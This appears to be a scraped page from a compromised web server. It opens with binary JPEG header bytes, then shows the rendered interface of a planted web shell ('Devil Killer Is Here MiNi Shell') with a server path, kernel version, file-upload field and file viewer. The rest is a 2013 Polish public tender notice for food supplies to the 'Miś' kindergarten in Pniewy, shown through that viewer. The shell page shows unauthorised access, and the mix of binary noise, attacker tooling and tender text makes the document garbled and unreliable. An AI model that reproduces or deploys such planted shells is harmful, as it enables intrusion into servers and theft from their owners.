JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130807/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130807/318162-N-2013.html

<p class="kh_header"><b>Pniewy: Dostawa artykułów spożywczych dla Przedszkola Miś w Pniewach</b><br>
<b>Numer ogłoszenia: 318162 - 2013; data zamieszczenia: 07.08.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Przedszkole "Miś" , ul. Dworcowa 23, 62-045 Pniewy, woj. wielkopolskie, tel. 061 2911216.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.przedszkole-mis.pniewy.org</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka organizacyjna Gminy Pniewy.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa artykułów spożywczych dla Przedszkola Miś w Pniewach.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> TABELA  A*  WARZYWA I OWOCE
Nazwa artykułu	Jednostk miary	Ilość Marchew luzem kg60 Pietruszka korzeń kg50 Rzodkiewka świeża p pęczek 50  Sałata  szt.50 Por korzeń kg30 Cebula biała kg40 Buraki czerwone kg80 Seler korzeń kg60 Jabłka lobo  kg.100 Mandarynki  kg80 Kiwi luz kg5  Cytryny kg8 Ziemniaki jadalne kg2000 Kapusta czerwona świeża   kg 100 Kapusta pekińska  szt. 50 Kalafior świeży  szt.40 Pomidory luz kg   60 Ogórki szklarniowe kg60 Ogórki kwaszone  kg   50 Kapusta kwaszona kg60 Kapusta biała główka kg kg     50  Pieczarki świeże luz kg  30 Banan kg100 Papryka konserwowa 0,9l szt. szt.15 Ogórki konserwowe 0,9l szt.35 Papryka świeża  kg 5 Szczypior pęczek 30 Koper świeży pęczek 30 Natka pietruszki p.pęczek 30 Maliny 2,5 kg szt.30Jagody 2,5 kg szt.30					
TABELA B*  MIĘSO I PRZETWORY
Nazwa artykułu	Jedn Miary Ilość Kości od schabu kg200	Ogonówka wieprzowa wędzona  kg 120	 Boczek wędzony wieprz. B k kg m30 Parówka gruba wieprzowa 30%tłkg80 Szynka wieprzowa wędzona got.kg90 Mięso wieprzowe mielone drobnekg80Mielonka zapiekana wieprzowa kg40 Mięso gulaszowe wieprzowekg100 Filet drobiowy z kurczakakg160 Żeberka wieprzowe kg50 Porcje rosołowe z kurczaka kg 20 Kiełbasa wieprzowa grubakg160 Udka z kurczakakg80 mKarkówka b k wieprzowakg90 Kaszanka kg 60Kurczak świeży patroszony do 2kg kg 90Wątróbka wieprzowa kg60  Parówka drobiowa cienka kg 90  Kotlet schabowy b k kg 45 Pasztet drobiowy kg 60 Smalec luz kg 30					
TABELA C*  MROŻONKI
Nazwa artykułu Jednostka miary Ilość Fasolka szparagowa mrożona 2,5  kg op.	szt. 80 Truskawki mrożone  2,5  kg op..	szt. 60 Mieszanka warzywna paski 2,5  kg op. szt. 80 Brokuły mrożone 2,5  kg op. szt. 60Zupa pieczarkowa, 2,5  kg op.	szt. 40   Zupa kalafiorowa, 2,5  kg op. szt. 50Zupa jarzynowa, 2,5  kg op. szt. 50Kalafior, 2,5  kg op. szt.50 Pyzy drożdżowe op.9sztszt 200   Groszek zielony, 2,5  kg op.szt.50 Marchew z groszkiem, 2,5  kg op.szt.50 Wiśnie drążone 2,5  kg op.szt.10 Kompotowe 2,5  kg op.   szt. 100					
TABELA D* PRZETWORY MĄCZNE, INNE
Nazwa artykułu	Jednostka miary Ilość Mąka pszenna 500  kg200 Ryż długoziarnisty  kg80Kawa zbożowa (typu inka)150 g szt.15	Kasza jęczmienna średnia luz kg30 Kasza manna 1kg szt.15 Kisiel różne smaki 40 g	szt.300	Budyń różne smaki 40 g	szt.300	Fasola czerwona konserwowa 450g op.	szt.15	Cukier biały kryształ, paczkowany 1kg	szt.500	Syrop wieloowocowy, wysokosłodzony 1l szt.30 Napoje różne smaki 0.20l kartonik szt.800 Krem do smarowania orzech.-czek. 200g szt.150 Miód pszczeli nektarowy lipowy 230 g szt.80	Dżemy różne smaki 0,90 l szt.60 Kakao naturalne 200 g op.szt.10 nMajonez dekoracyjny 0,7 kg op. szt.50 Musztarda sarepska 0,9 kg op. szt.3 Płatki kukurydziane 250 g op.szt.60 Groch połówki kg.40 Fasola sucha luz kgszt.40 Koncentrat  pomidorowy 30% 0,9 l 	szt.50	Galaretka różne smaki 0,75g	szt.      240 Proszek do pieczenia 36g	szt.30	Drożdże piekarskie 100g szt.60	Ketchup łagodny 500g	szt. 5 Ocet spirytusowy 10%, 0,5l	szt.20	Sól 1kg	szt.60	Liść laurowy 10g szt.30	Cukier waniliowy 32g szt.60 Cukier puder 0,5kg	szt.40	Kwasek cytrynowy spożywczy 20g szt.30 Rodzynki 200g	szt.5 Ananas puszka plastry, 0,58 kg	szt.30	Brzoskwinia puszka połówki, 850dkg	szt.30	Kukurydza konserwowa 400 ml	szt.30	Groszek zielony puszka 400ml	szt.30Przecier ogórkowy 0,5 kg op. szt.50	Cynamon 20 g	szt.20	Ziele angielskie 100g	szt.30	Mąka ziemniaczana 1kg kg5 Olej roślinny, 1l  szt.120  Szprot w pomidorach puszka  170g op. szt.40 Paprykarz szczecinecki 135g op. szt.80 Pasztet drobiowy 131g  op. Szt.  100 Woda niegazowana 5l  szt.  300 Imbir 100 g szt.30 Czosnek szt.30  Bazylia 100 g szt.30 Oregano 100 g  szt.30 herbaty ziołowe szt. 30 ryż ciemny kg 30 kasza gryczana kg 30 zioła prowasalskie szt. 30					
TABELA E* SŁODYCZE
Nazwa artykułu	Jedn. Miary Ilość Cukierki mieszane czekolad 2,5kg op.	szt.5 Wafle nadziewane w czekoladzie 28g (typu: Grześki) 30 szt op display szt.10 Wafle kakaowe  b/czekolady (typu:Grześki) 30 szt op display	szt.20 Wafle śmietankowe 3,2 kg op. szt.3 Biszkopty 120g op. szt.100 Baton mleczny 23,5g 30szt op display	szt.20	Draże różne smaki 100g op. szt.250 Batoniki nadziewane masą w mlecznej czekoladzie różne smaki 45g  24szt. op. szt. 10 Figurki czekoladowe -mikołaje	szt.280					
TABELA F* PIECZYWO
Nazwa artykułu	Jedn. Miary IlośćChleb baltonowski krojony 0,6 kg szt. 1600 Chleb razowy 0,5 kg litewski szt.400 Bułka firmowa  0,06 kg szt.3500 Bułka maślana 0,05 kg szt.2500 Chleb pszenny 0,35 kgszt.600 Drożdżówki szt.500 Bułka tarta 1 kg szt.50 Babka okrągła średnia 0,5kg szt. 50					
TABELA G*  NABIAŁ
Nazwa artykułu	Jednostka miary Ilość Śmietana 12% słodka 0,5l  kartonik szt. 130 Śmietana zakwaszana 12% 180g szt. 50 Twaróg półtłusty 250 g op. szt. 400 Ser homogenizowany  tłusty 200 g  szt. 70 Ser salami luz kg 60 Sery topione bloczki 100g op. różne smaki szt.180 Jajka kurze świeże średnie  szt.1800Mleko 2% folia 0,9l op. szt.1200 Serdelek topiony kiełbaski 100g szt.150 Ser kanapkowy 150g op.szt.150 Ser królewski luz kg50 Maślanka naturalna, karton  1l  PL28101601 WEszt.50	Jogurt naturalny 0,45l op. szt. 10 Jogurt smakowy 125g szt. 1200 Śmietanka kremowa 36% 0,5l szt.20 Margaryna zwykła250g szt.220Masło śmietankowe200g op. zaw. 86%tł.szt.1700					
TABELA H* MAKARONY I PRZYPRAWY
Nazwa artykułu	Jednostka miary Ilość Sos pieczeniowy 3kg op.szt.2 Majeranek 0,25kg op szt.5 Delikat do mięs i innych potraw 600g op.szt.3 Delikat do drobiu 600g op. szt. 3	Delikat do mięs 4,8 kg op. szt.1Delikat do ryb 600g op.szt. 1Przyprawa szefa kuchni 1kg op.szt. 5	Makaron świderki, 100% pszenicy Durum 3kg op. szt.27	Makaron nitki 100% pszenicy Durum 3kgop.szt.5 Makaron rurki 100% pszenicy Durum 3kgop.szt.6 Makaron koła 100% pszenicy Durum 3kgop.szt.27	Makaron łazanki 100% pszenicy Durum 3kg op.	szt.18	Makaron kokardki 100% pszenicy Durum 3kg op.szt.27	Soki wysokosłodzone 5l	szt. 30	Sos myśliwski 1,1 kg  op. szt  2	Herbata granulowana 100 g op.	szt. 100 Papryka słodka syp. 0,5kg szt. 2 Pieprz mielony 0,5 kg szt. 3	Przyprawa w płynie 1l	szt. 3 
TABELA  I*  RYBY
Nazwa towaru	Jednostka miary Ilość Ryby mrożone filet z Pangi kg op.	Kg 60 Ryby mrożone filet z mintaja kg op.	Kg 60 Ryby wiadro płaty śledziowe ocet 2,5 kg op. Szt 4.</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>według zapotrzebowania</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 03.20.00.00-3, 15.10.00.00-9, 15.20.00.00-0, 15.30.00.00-1, 15.40.00.00-2, 15.50.00.00-3, 15.60.00.00-4, 15.80.00.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 9.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 02.09.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki wynikające z art. 22 ust 1 - 3 ustawy z dnia 29 stycznia 2004 PZP oraz nie podlegają wykluczeniu na podstawie art. 24 ust 1-2 ustawy, złożą wymagane i opisane w SIWZ oświadczenia i dokumenty. Informacja o oświadczeniach i dokumentach  jakie mają dostarczyć wykonawcy  w celu potwierdzenia spełnienia warunków udziału w postępowaniu. W celu potwierdzenia spełnienia warunków Oferenci zobowiązani są do przedstawienia w ofercie następujących dokumentów i oświadczeń: Wypełniony formularz oferty dla danej tabeli. Oświadczenie o spełnianiu warunków określonych  w art. 22 ust. 1 oraz art. 24 ust. 1-2 ustawy (załącznik nr 2), aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji  działalności gospodarczej - wystawione nie wcześniej niż 6 miesięcy  przed upływem terminu składania ofert  (oryginał lub kopia poświadczona za zgodność z oryginałem  przez wykonawcę). W przypadku występowania pełnomocnika należy dołączyć pełnomocnictwo dla osób podpisujących ofertę do podejmowania zobowiązań w imieniu firmy składającej ofertę, o ile nie wynikają z przepisów prawa lubinnych dokumentów. Dokumenty stanowiące załączniki wymagane przez niniejsze SIWZ muszą zostać wypełnione przez oferenta bez wyjątku ściśle według warunków i postanowień w nich zawartych - bez dokonywania żadnych zmian i uzupełnień. Miejsca wykropkowane przeznaczone do wypełnienia muszą zostać prawidłowo wypełnione.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>



<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.przedszkole-mis.pniewy.org<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Przedszkole Miś
ul. Dworcowa 23
62-045 Pniewy.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.08.2013 godzina 09:00, miejsce: Przedszkole Miś
ul. Dworcowa 23
62-045 Pniewy
biuro Dyrektora na parterze.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> TABELA  A*  WARZYWA I OWOCE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Nazwa artykułu	Jednostk miary	Ilość Marchew luzem kg60 Pietruszka korzeń kg50 Rzodkiewka świeża p pęczek 50  Sałata  szt.50 Por korzeń kg30 Cebula biała kg40 Buraki czerwone kg80 Seler korzeń kg60 Jabłka lobo  kg.100 Mandarynki  kg80 Kiwi luz kg5  Cytryny kg8 Ziemniaki jadalne kg2000 Kapusta czerwona świeża   kg 100 Kapusta pekińska  szt. 50 Kalafior świeży  szt.40 Pomidory luz kg   60 Ogórki szklarniowe kg60 Ogórki kwaszone  kg   50 Kapusta kwaszona kg60 Kapusta biała główka kg kg     50  Pieczarki świeże luz kg  30 Banan kg100 Papryka konserwowa 0,9l szt. szt.15 Ogórki konserwowe 0,9l szt.35 Papryka świeża  kg 5 Szczypior pęczek 30 Koper świeży pęczek 30 Natka pietruszki p.pęczek 30 Maliny 2,5 kg szt.30Jagody 2,5 kg szt.30.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 03.20.00.00-3, 15.10.00.00-9, 15.20.00.00-0, 15.30.00.00-1, 15.40.00.00-2, 15.50.00.00-3, 15.60.00.00-4, 15.80.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 02.09.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> TABELA B*  MIĘSO I PRZETWORY.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Nazwa artykułu	Jedn Miary Ilość Kości od schabu kg200	Ogonówka wieprzowa wędzona  kg 120	 Boczek wędzony wieprz. B k kg m30 Parówka gruba wieprzowa 30%tłkg80 Szynka wieprzowa wędzona got.kg90 Mięso wieprzowe mielone drobnekg80Mielonka zapiekana wieprzowa kg40 Mięso gulaszowe wieprzowekg100 Filet drobiowy z kurczakakg160 Żeberka wieprzowe kg50 Porcje rosołowe z kurczaka kg 20 Kiełbasa wieprzowa grubakg160 Udka z kurczakakg80 mKarkówka b k wieprzowakg90 Kaszanka kg 60Kurczak świeży patroszony do 2kg kg 90Wątróbka wieprzowa kg60  Parówka drobiowa cienka kg 90  Kotlet schabowy b k kg 45 Pasztet drobiowy kg 60 Smalec luz kg 30.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 03.20.00.00-3, 15.10.00.00-9, 15.20.00.00-0, 15.30.00.00-1, 15.40.00.00-2, 15.50.00.00-3, 15.60.00.00-4, 15.80.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 02.09.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> TABELA C*  MROŻONKI.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Nazwa artykułu Jednostka miary Ilość Fasolka szparagowa mrożona 2,5  kg op.	szt. 80 Truskawki mrożone  2,5  kg op..	szt. 60 Mieszanka warzywna paski 2,5  kg op. szt. 80 Brokuły mrożone 2,5  kg op. szt. 60Zupa pieczarkowa, 2,5  kg op.	szt. 40   Zupa kalafiorowa, 2,5  kg op. szt. 50Zupa jarzynowa, 2,5  kg op. szt. 50Kalafior, 2,5  kg op. szt.50 Pyzy drożdżowe op.9sztszt 200   Groszek zielony, 2,5  kg op.szt.50 Marchew z groszkiem, 2,5  kg op.szt.50 Wiśnie drążone 2,5  kg op.szt.10 Kompotowe 2,5  kg op.   szt. 100.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 03.20.00.00-3, 15.10.00.00-9, 15.20.00.00-0, 15.30.00.00-1, 15.40.00.00-2, 15.50.00.00-3, 15.60.00.00-4, 15.80.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 02.09.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> TABELA D* PRZETWORY MĄCZNE, INNE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Nazwa artykułu	Jednostka miary Ilość Mąka pszenna 500  kg200 Ryż długoziarnisty  kg80Kawa zbożowa (typu inka)150 g szt.15	Kasza jęczmienna średnia luz kg30 Kasza manna 1kg szt.15 Kisiel różne smaki 40 g	szt.300	Budyń różne smaki 40 g	szt.300	Fasola czerwona konserwowa 450g op.	szt.15	Cukier biały kryształ, paczkowany 1kg	szt.500	Syrop wieloowocowy, wysokosłodzony 1l szt.30 Napoje różne smaki 0.20l kartonik szt.800 Krem do smarowania orzech.-czek. 200g szt.150 Miód pszczeli nektarowy lipowy 230 g szt.80	Dżemy różne smaki 0,90 l szt.60 Kakao naturalne 200 g op.szt.10 nMajonez dekoracyjny 0,7 kg op. szt.50 Musztarda sarepska 0,9 kg op. szt.3 Płatki kukurydziane 250 g op.szt.60 Groch połówki kg.40 Fasola sucha luz kgszt.40 Koncentrat  pomidorowy 30% 0,9 l 	szt.50	Galaretka różne smaki 0,75g	szt.      240 Proszek do pieczenia 36g	szt.30	Drożdże piekarskie 100g szt.60	Ketchup łagodny 500g	szt. 5 Ocet spirytusowy 10%, 0,5l	szt.20	Sól 1kg	szt.60	Liść laurowy 10g szt.30	Cukier waniliowy 32g szt.60 Cukier puder 0,5kg	szt.40	Kwasek cytrynowy spożywczy 20g szt.30 Rodzynki 200g	szt.5 Ananas puszka plastry, 0,58 kg	szt.30	Brzoskwinia puszka połówki, 850dkg	szt.30	Kukurydza konserwowa 400 ml	szt.30	Groszek zielony puszka 400ml	szt.30Przecier ogórkowy 0,5 kg op. szt.50	Cynamon 20 g	szt.20	Ziele angielskie 100g	szt.30	Mąka ziemniaczana 1kg kg5 Olej roślinny, 1l  szt.120  Szprot w pomidorach puszka  170g op. szt.40 Paprykarz szczecinecki 135g op. szt.80 Pasztet drobiowy 131g  op. Szt.  100 Woda niegazowana 5l  szt.  300 Imbir 100 g szt.30 Czosnek szt.30  Bazylia 100 g szt.30 Oregano 100 g  szt.30 herbaty ziołowe szt. 30 ryż ciemny kg 30 kasza gryczana kg 30 zioła prowasalskie szt. 30.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 03.20.00.00-3, 15.10.00.00-9, 15.20.00.00-0, 15.30.00.00-1, 15.40.00.00-2, 15.50.00.00-3, 15.60.00.00-4, 15.80.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 02.09.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> TABELA E* SŁODYCZE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Nazwa artykułu	Jedn. Miary Ilość Cukierki mieszane czekolad 2,5kg op.	szt.5 Wafle nadziewane w czekoladzie 28g (typu: Grześki) 30 szt op display szt.10 Wafle kakaowe  b/czekolady (typu:Grześki) 30 szt op display	szt.20 Wafle śmietankowe 3,2 kg op. szt.3 Biszkopty 120g op. szt.100 Baton mleczny 23,5g 30szt op display	szt.20	Draże różne smaki 100g op. szt.250 Batoniki nadziewane masą w mlecznej czekoladzie różne smaki 45g  24szt. op. szt. 10 Figurki czekoladowe -mikołaje	szt.280.</p></li>
